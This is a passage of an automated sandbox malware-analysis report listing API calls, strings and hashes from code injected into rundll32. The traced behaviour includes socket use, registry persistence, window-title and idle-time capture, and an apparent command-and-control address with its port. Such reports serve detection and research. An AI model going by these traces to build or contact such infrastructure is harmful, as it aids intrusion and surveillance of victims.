                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0421C7D8,000012A0), ref: 042053C0
                              • RegCloseKey.KERNEL32(?), ref: 042053CB
                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0420541F
                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0420542B
                              • Sleep.KERNEL32(00000BB8), ref: 04205444
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                              • String ID: IpDates_info$SOFTWARE
                              • API String ID: 864241144-2243437601
                              • Opcode ID: 7bbfc6945f8c07662aaaa09fc274e540deb5898c1a06615fb94af005a1448b2d
                              • Instruction ID: 15a463e809598def823cf6890f2d3679769257c443f42d8d4e97de3d0f7fd953
                              • Opcode Fuzzy Hash: 7bbfc6945f8c07662aaaa09fc274e540deb5898c1a06615fb94af005a1448b2d
                              • Instruction Fuzzy Hash: 9431C4303A4281BFD720CF209808B797BE4AFA8744F9C9498E5869A193D7B0F881CF51
                              APIs
                              • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CBEB6BC
                              • ioctlsocket.WS2_32(?,8004667E,?), ref: 6CBEB6DA
                              • GetLastError.KERNEL32 ref: 6CBEB6F0
                              • GetLastError.KERNEL32 ref: 6CBEB736
                              • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 6CBEB83F
                              • GetLastError.KERNEL32 ref: 6CBEB84A
                              • closesocket.WS2_32(?), ref: 6CBEB9F0
                                • Part of subcall function 6CC47A4F: setsockopt.WS2_32(?,0000FFFF,?,?,00000004), ref: 6CC47A63
                              Strings
                              • tcp open errortcp set_nonblocking errortcp bind local error, xrefs: 6CBEB6F9
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLast$IoctlSocketclosesocketioctlsocketsetsockopt
                              • String ID: tcp open errortcp set_nonblocking errortcp bind local error
                              • API String ID: 2822801258-1475804424
                              • Opcode ID: 758c5f6e1fd38a7aa236a6b3213e9d5b4d36f5e5691c3be49f2fcb537c361593
                              • Instruction ID: d1c4caf80f5a06151607f523fbf9e0a5c539bd7e68f3d41dccaed7778be5ad57
                              • Opcode Fuzzy Hash: 758c5f6e1fd38a7aa236a6b3213e9d5b4d36f5e5691c3be49f2fcb537c361593
                              • Instruction Fuzzy Hash: 81E1B0716083819FE714CF24C480B9ABBF1FF89B54F108A1DF9989B691D771D885CB86
                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6CC46BC7
                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 6CC46BDB
                              • memset.VCRUNTIME140(?,00000000,00000110,00000000,RtlGetVersion), ref: 6CC46BF9
                              • AcquireCredentialsHandleA.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 6CC46CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Handle$AcquireAddressCredentialsModuleProcmemset
                              • String ID: Microsoft Unified Security Protocol Provider$RtlGetVersion$bE$ntdll.dll
                              • API String ID: 166702113-1116218560
                              • Opcode ID: 6117cf1bb5bc2ab00e7dec8256bcfbf32b5c269a08f867043eaad451e0110db5
                              • Instruction ID: fa940e65551d64de0bef833ac67f17e7ce29466ce7a989ccbfbfeb79238eb5e5
                              • Opcode Fuzzy Hash: 6117cf1bb5bc2ab00e7dec8256bcfbf32b5c269a08f867043eaad451e0110db5
                              • Instruction Fuzzy Hash: 90714971A48B459BE320CF25C840B6AB7F4FFC9718F10CA1DE5889B681EB70E485CB55
                              APIs
                                • Part of subcall function 04207734: __fassign.LIBCMT ref: 0420772A
                              • Sleep.KERNEL32(00000000), ref: 0420615C
                                • Part of subcall function 042070D7: _malloc.LIBCMT ref: 042070F1
                              • Sleep.KERNEL32(00000000), ref: 042062C1
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0420630D
                                • Part of subcall function 04202C60: WSAStartup.WS2_32(00000202,?), ref: 04202CBF
                                • Part of subcall function 04202C60: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04202CCA
                                • Part of subcall function 04202C60: InterlockedExchange.KERNEL32(00000018,00000000), ref: 04202CD8
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04206357
                              • CloseHandle.KERNEL32(?), ref: 04206375
                              • CloseHandle.KERNEL32(?), ref: 04206382
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CloseCreateEventHandleSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                              • String ID: 45.204.213.99$7677
                              • API String ID: 3083163006-1603803548
                              • Opcode ID: 1e8d45e5aa831b625a9788dec161b2664d398bd4e0bcf30ed3562338046291cd
                              • Instruction ID: 7df508c2e0ec7c6385577549e2f683f0f94786f988e5c5a22fa7a355082c46fd
                              • Opcode Fuzzy Hash: 1e8d45e5aa831b625a9788dec161b2664d398bd4e0bcf30ed3562338046291cd
                              • Instruction Fuzzy Hash: 0051C8B0B61205AFDB10DFA8E8C596EBBF5EFA8714F104125E010A7292CE74BD41CFA1
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14C4B
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D08
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D40
                              • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CC14DC4
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14DDB
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14E62
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC14F5D
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC1502A
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15052
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15104
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC1534C
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15381
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15832
                              • memmove.VCRUNTIME140(?,?,00000118), ref: 6CC15EB4
                              • memmove.VCRUNTIME140(?,?,0000011C), ref: 6CC15ED2
                              • memmove.VCRUNTIME140(0000002C,?,0000011C), ref: 6CC15F29
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: U9W{
                              • API String ID: 2162964266-3288374708
                              • Opcode ID: fe0a8e54bb1729b1e81785b64a5a260c002d1bfa04f08463dfdc38c3afe2665c
                              • Instruction ID: 64ab14800f82ed232d3c8f84798c8ddb6b0b60b60415b703a4e2280f0d414d8a
                              • Opcode Fuzzy Hash: fe0a8e54bb1729b1e81785b64a5a260c002d1bfa04f08463dfdc38c3afe2665c
                              • Instruction Fuzzy Hash: C112AE75908B858FC722CF25C4807DBB7F5BF8A341F044A6DD8891F642EB70A589DB92
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,6CCB5F8C,6CCB5F64), ref: 6CC02202
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CCB5F8C,6CCB5F64), ref: 6CC0222D
                              Strings
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC020E0
                              • cannot poll Select twice, xrefs: 6CC020FC
                              • dns error, xrefs: 6CC0154C
                              • invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError, xrefs: 6CC011EC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: cannot poll Select twice$dns error$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError
                              • API String ID: 2162964266-100685727
                              • Opcode ID: 544f5beb891f6fa8c3723762f1b9c8b3dba5ace2d9edd1441df9c84951ed29e3
                              • Instruction ID: 4aada4d41ffb0beeb3c5402e26dacec6d95540ab9af558e807324925b33fcf11
                              • Opcode Fuzzy Hash: 544f5beb891f6fa8c3723762f1b9c8b3dba5ace2d9edd1441df9c84951ed29e3
                              • Instruction Fuzzy Hash: 7FB26C31A08B448FC725CF28C49079AF7F1FF89354F148A1EE89D9B651EB71A985CB42
                              APIs
                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,04DD12F8,B7FCE562,00000001,00000000,00000000), ref: 04DBCA31
                              • RegQueryInfoKeyW.ADVAPI32(04DD12F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04DBCA60
                              • _memset.LIBCMT ref: 04DBCAC4
                              • _memset.LIBCMT ref: 04DBCAD3
                              • RegEnumValueW.KERNEL32(04DD12F8,?,00000000,?,00000000,?,00000000,?), ref: 04DBCAF2
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                                • Part of subcall function 04DBF667: std::exception::exception.LIBCMT ref: 04DBF6B6
                                • Part of subcall function 04DBF667: std::exception::exception.LIBCMT ref: 04DBF6D0
                                • Part of subcall function 04DBF667: __CxxThrowException@8.LIBCMT ref: 04DBF6E1
                              • RegCloseKey.KERNEL32(04DD12F8,?,?,?,?,?,?,?,?,?,?,?,00000000,04DD12F8,000000FF), ref: 04DBCC03
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                              • String ID: Console\0
                              • API String ID: 1348767993-1253790388
                              • Opcode ID: 676b63c49d45405b07e72a9b31783cc6f7b579accc9eeb57bdcb17c05d63510a
                              • Instruction ID: eb199c90e8ec9d0f08a7871add42ba4d40cd6adcb21bb6a479bb103ea91a25c2
                              • Opcode Fuzzy Hash: 676b63c49d45405b07e72a9b31783cc6f7b579accc9eeb57bdcb17c05d63510a
                              • Instruction Fuzzy Hash: F7611CB1A01219EFDB04DFA8D880EEEB7B9FB48714F14456AE916E7341D735A901CBA0
                              APIs
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • _memset.LIBCMT ref: 04DBBAA1
                              • GetLastInputInfo.USER32(?), ref: 04DBBAB7
                              • GetTickCount.KERNEL32 ref: 04DBBABD
                              • wsprintfW.USER32 ref: 04DBBAE6
                              • GetForegroundWindow.USER32 ref: 04DBBAEF
                              • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 04DBBB03
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                              • String ID: %d min
                              • API String ID: 3754759880-1947832151
                              • Opcode ID: 5da42c4a30e2c8e06e33422632983acd0af0d1227e01ed4ecfbcd90e348b639c
                              • Instruction ID: 4bad11ad2164d08eeba46f8d7978e74841d2fb0ff25f7e31343148cc9ffb74bb
                              • Opcode Fuzzy Hash: 5da42c4a30e2c8e06e33422632983acd0af0d1227e01ed4ecfbcd90e348b639c
                              • Instruction Fuzzy Hash: 264180B5A00104EBDB14DFA4DC88EDEBBB8EF48700F048159E94A9B355D674BA04CBE1
                              APIs
                              • GetCurrentProcessId.KERNEL32(B7FCE562,00000000,00000000,00000994,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68C8
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68D7
                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68F0
                              • CloseHandle.KERNEL32(00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68FB
                              • SysStringLen.OLEAUT32(00000000), ref: 04DB694E
                              • SysStringLen.OLEAUT32(00000000), ref: 04DB695C
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,04DD10DB,000000FF), ref: 04DB69BE
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,04DD10DB,000000FF), ref: 04DB69C4
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$OpenString$CurrentToken
                              • String ID:
                              • API String ID: 429299433-0
                              • Opcode ID: ad342f2705bd4d4fdfd93e65391df7e16f1e28db384d5902ca8218c8e4960f24
                              • Instruction ID: a623731be2830ca2598bd0022ef0eb75af7bdae92930d610d2e7785875384cc0
                              • Opcode Fuzzy Hash: ad342f2705bd4d4fdfd93e65391df7e16f1e28db384d5902ca8218c8e4960f24
                              • Instruction Fuzzy Hash: 4641A1B2A00215DBDB11DFA8CC80AEEB7B8FB45704F144569E996F7340E635A900CBE1
                              APIs
                              Strings
                              • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6CBE7E79
                              • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 6CBE7E8B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLast$getpeernamegetsockname
                              • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                              • API String ID: 1444953621-3544120690
                              • Opcode ID: c5d2965c9ba57fc75f3414c8ea2ec2ae1673657f1240f3f9f77d1fd7062722dc
                              • Instruction ID: 09f8e2b9d40287e17c923a777101587b4a5735338444fd3a9cc1237f2f479c60
                              • Opcode Fuzzy Hash: c5d2965c9ba57fc75f3414c8ea2ec2ae1673657f1240f3f9f77d1fd7062722dc
                              • Instruction Fuzzy Hash: BDA16B30808B809AD315CF29C4416ABB7F4FFCA754F009A0DF8D9AB661E7B58985DB43
                              APIs
                              • __aulldiv.LIBCMT ref: 6CBEB5A6
                              • __aulldiv.LIBCMT ref: 6CBEB5E8
                              • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CBEB6BC
                              • ioctlsocket.WS2_32(?,8004667E,?), ref: 6CBEB6DA
                              • closesocket.WS2_32(?), ref: 6CBEB9F0
                              Strings
                              • tcp set_nonblocking errortcp bind local error, xrefs: 6CBEB750
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: __aulldiv$Socketclosesocketioctlsocket
                              • String ID: tcp set_nonblocking errortcp bind local error
                              • API String ID: 2345199343-2725198832
                              • Opcode ID: 1d203ed30722f0168e89acee2842f958bcedb555088240f4055446252d71f79c
                              • Instruction ID: 44d6fe3b481e30ccb7f0a6cce53aecbfd33499f831b4c762284596622ad4f9c1
                              • Opcode Fuzzy Hash: 1d203ed30722f0168e89acee2842f958bcedb555088240f4055446252d71f79c
                              • Instruction Fuzzy Hash: 785121302047409FD708CF19C880B6AB7F6EF89794F10CA2DF5598B281E770E845CB92
                              APIs
                              • _memset.LIBCMT ref: 04DB6D59
                              • RegOpenKeyExW.KERNEL32(80000001,04DD5164,00000000,00020019,000008CC), ref: 04DB6D7C
                              • RegQueryValueExW.KERNEL32(000008CC,GROUP,00000000,00000001,?,00000208), ref: 04DB6DCA
                              • lstrcmpW.KERNEL32(?,04DD5148), ref: 04DB6DE0
                              • lstrcpyW.KERNEL32(04DB5676,?), ref: 04DB6DF2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                              • String ID: GROUP
                              • API String ID: 2102619503-2593425013
                              • Opcode ID: cb7c78a5b2f61a91b412c1a7bc999460be8e7736259984e8fb0c5f4bc8974c5c
                              • Instruction ID: 00006f489578a8d7f918a362a70f61ae1b27b0c188bfd8e4c67898a7baa28067
                              • Opcode Fuzzy Hash: cb7c78a5b2f61a91b412c1a7bc999460be8e7736259984e8fb0c5f4bc8974c5c
                              • Instruction Fuzzy Hash: DA316571A41319EBDB20DF90DD89BDEB7B8FB48714F104299E506A7280DB74EA44CFA1
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 04DBF9AE
                              • __calloc_crt.LIBCMT ref: 04DBF9BA
                              • __getptd.LIBCMT ref: 04DBF9C7
                              • CreateThread.KERNEL32(00000000,00000000,04DBF924,00000000,00000000,04DBDF63), ref: 04DBF9FE
                              • GetLastError.KERNEL32(?,00000000,?,?,04DBDF63,00000000,00000000,04DB5ED0,00000000,00000000,00000000), ref: 04DBFA08
                              • _free.LIBCMT ref: 04DBFA11
                              • __dosmaperr.LIBCMT ref: 04DBFA1C
                                • Part of subcall function 04DBF87B: __getptd_noexit.LIBCMT ref: 04DBF87B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 3932d915ccb5a01967047440b5381136c333e5ba4a151eb145e67725ec327245
                              • Instruction ID: ed836bd8c36f0173b7d8fa4c98c6645c90ce2e1a319057e7917871171fd82246
                              • Opcode Fuzzy Hash: 3932d915ccb5a01967047440b5381136c333e5ba4a151eb145e67725ec327245
                              • Instruction Fuzzy Hash: E411CE32300706EFAB15AFA4DC809DB37E8EF09768B10402DF986D7150DB30E8018AB1
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 04207400
                              • __calloc_crt.LIBCMT ref: 0420740C
                              • __getptd.LIBCMT ref: 04207419
                              • CreateThread.KERNEL32(?,?,04207376,00000000,?,?), ref: 04207450
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0420745A
                              • _free.LIBCMT ref: 04207463
                              • __dosmaperr.LIBCMT ref: 0420746E
                                • Part of subcall function 042072CD: __getptd_noexit.LIBCMT ref: 042072CD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 970085bbc74a556762baab78e68388534805f6bb3890b2bf606bc78a83e80f97
                              • Instruction ID: 71a93f80cd5fc85662d7a7b699c5419b5483c0157617c87855e33205f98c4b32
                              • Opcode Fuzzy Hash: 970085bbc74a556762baab78e68388534805f6bb3890b2bf606bc78a83e80f97
                              • Instruction Fuzzy Hash: 2E11E932320706AFE711AFB5DC4099B7BE9EF85374B10C125F955861D3DB75F40086A1
                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73BD
                              • GetProcAddress.KERNEL32(00000000), ref: 04DB73C4
                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73D2
                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: InfoSystem$AddressHandleModuleNativeProc
                              • String ID: GetNativeSystemInfo$kernel32.dll
                              • API String ID: 3433367815-192647395
                              • Opcode ID: 0b45bb9d620794a3cfd0a1ad45d3f8c41d4161ddfd3ae523d742d1a4e071d442
                              • Instruction ID: 3daec2589c73619c083c7ffea06e492bdbcbc5283f722d349c6407aba7d1a8d1
                              • Opcode Fuzzy Hash: 0b45bb9d620794a3cfd0a1ad45d3f8c41d4161ddfd3ae523d742d1a4e071d442
                              • Instruction Fuzzy Hash: F901D670E012099FCF50DFB899556EEBBF5EB48300F5045A9D95AE2340E67AAA408BA1
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 04DBF92A
                                • Part of subcall function 04DC3C86: TlsGetValue.KERNEL32(00000000,04DC3DDF,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76,00000000,00000000), ref: 04DC3C8F
                                • Part of subcall function 04DC3C86: DecodePointer.KERNEL32(?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76,00000000,00000000,?,04DC3EEC,0000000D), ref: 04DC3CA1
                                • Part of subcall function 04DC3C86: TlsSetValue.KERNEL32(00000000,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76,00000000,00000000,?,04DC3EEC), ref: 04DC3CB0
                              • ___fls_getvalue@4.LIBCMT ref: 04DBF935
                                • Part of subcall function 04DC3C66: TlsGetValue.KERNEL32(?,?,04DBF93A,00000000), ref: 04DC3C74
                              • ___fls_setvalue@8.LIBCMT ref: 04DBF948
                                • Part of subcall function 04DC3CBA: DecodePointer.KERNEL32(?,?,?,04DBF94D,00000000,?,00000000), ref: 04DC3CCB
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 04DBF951
                              • ExitThread.KERNEL32 ref: 04DBF958
                              • GetCurrentThreadId.KERNEL32 ref: 04DBF95E
                              • __freefls@4.LIBCMT ref: 04DBF97E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 2383549826-0
                              • Opcode ID: 9957925bf0d2a80f46a25137a174bd6527d752b1b17a4b9baec280f5000d3392
                              • Instruction ID: a16f0eb3ffa427c79ec7c603b0ec2c37dca7dccc9cf024e9dfc69b64f4bf4b29
                              • Opcode Fuzzy Hash: 9957925bf0d2a80f46a25137a174bd6527d752b1b17a4b9baec280f5000d3392
                              • Instruction Fuzzy Hash: 8AF01D74601202FBEB18BFB1CA4888E7BA9EF49248710C65CE98587211DA35F952DBF5
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 0420737C
                                • Part of subcall function 04209878: TlsGetValue.KERNEL32(7FFFFFFF,042099D1,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?), ref: 04209881
                                • Part of subcall function 04209878: DecodePointer.KERNEL32(?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000,0000000A), ref: 04209893
                                • Part of subcall function 04209878: TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000), ref: 042098A2
                              • ___fls_getvalue@4.LIBCMT ref: 04207387
